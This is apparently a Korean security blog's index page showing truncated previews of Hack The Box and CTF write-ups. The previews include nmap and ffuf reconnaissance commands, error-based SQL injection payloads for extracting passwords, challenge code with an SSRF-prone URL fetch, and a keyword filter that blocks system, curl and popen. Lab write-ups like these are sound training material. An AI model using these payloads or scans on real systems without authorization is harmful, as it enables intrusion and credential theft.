본문 바로가기

분류 전체보기

(58)
Certified (Windows · Medium) 정찰┌──(root㉿P00075445-006)-[/home/surckers]└─# nmap -p 53,88,135,139,389,445,464,592,636,3268,3269,9389,49666,49668,49685,49686,49689,49716,61104 -sCV --min-rate=10000 10.129.231.186Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-11 11:15 KSTNmap scan report for 10.129.231.186Host is up (0.29s latency).PORT STATE SERVICE VERSION53/tcp open domain Simple DNS Plus8..
aragog (Linux) 정찰─# nmap -p- -sT --min-rate=100000 10.129.119.26Starting Nmap 7.94SVN ( https://nmap.org/ ) at 2024-11-04 20:08 KSTWarning: 10.129.119.26 giving up on port because retransmission cap hit (10).Nmap scan report for 10.129.119.26Host is up (0.28s latency).Not shown: 61476 closed tcp ports (conn-refused), 4056 filtered tcp ports (no-response)PORT STATE SERVICE21/tcp open ftp22/tcp open ssh80/tc..
Devel (win) 정찰 수행┌──(root㉿BOOK-2S941CKO4U)-[/home/surckers]└─# nmap -sCV -p 21,80 10.129.126.222Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-23 11:01 KSTNmap scan report for 10.129.126.222Host is up (0.28s latency).PORT STATE SERVICE VERSION21/tcp open ftp Microsoft ftpd| ftp-anon: Anonymous FTP login allowed (FTP code 230)| 03-18-17 02:06AM aspnet_client| 03-17-17 05:37PM ..
MonitorsThree (Linux · Medium) 스캐닝nmap --host-timeout 10m -sCV -p 80,8084,22 --min-rate=10000 10.129.147.146ffuf -w /home/surckers/list/directory-list-2.3-big.txt -u http://monitorsthree.htb -H "Host: FUZZ.monitorsthree.htb" -fs 13560 취약점1 : SQLI/forgat_password.php 에 싱글 퀘테이션 입력 시username=sales'or+(SELECT+extractvalue(1,concat(0x3a,version())))--+username=sales'or+(SELECT+extractvalue(1,concat(0x3a,(SELECT+substring(password,..
r-xor-t 리버싱 문제코드 분석int __cdecl main(int argc, const char **argv, const char **envp){ int k; // [rsp+4h] [rbp-Ch] int j; // [rsp+8h] [rbp-8h] int i; // [rsp+Ch] [rbp-4h] puts("Input: "); __isoc99_scanf("%s", input); if ( strlen(input) == 64 ) { for ( i = 0; i @l>@Blspq@@B=GEsmC@ArBmAGlA=@q", 0x40uLL) ) { puts("\nNice!"); printf("Flag is DH{%s}\n", input); } return 0;} - input 64자 - rot..
[CodeEngn] Malware L08 Reversing 문제어셈블리어 그래프 절차를 읽어, 악성코드 실행 과정을 확인하는 문제 - 32비트 아키텍처 - 주요 악성 코드 실행 과정은 다음과 같다.1. 00402572 : inf 파일을 가져와서, 어떤 행위를 하던 loc_402589 호출2. loc_402589 과정 이후 어떤 결과가 오든 loc)402581 을 따름3. loc_4025f4로 가는 과정에서 shell 실
Dream Gallery 코드 분석@app.route('/request')def url_request(): url = request.args.get('url', '').lower() title = request.args.get('title', '') if url == '' or url.startswith("file://") or "flag" in url or title == '': return render_template('request.html') try: data = urlopen(url).read() mini_database.append({title: base64.b64encode(data).decode('utf-8')}) return redirect(..
Additional calculator 코드 분석#!/usr/bin/python3from flask import Flask, request, render_templateimport stringimport subprocessimport reapp = Flask(__name__)def filter(formula): w_list = list(string.ascii_lowercase + string.ascii_uppercase + string.digits) w_list.extend([" ", ".", "(", ")", "+"]) if re.search("(system)|(curl)|(flag)|(subprocess)|(popen)", formula, re.I): return True for c in formula: ..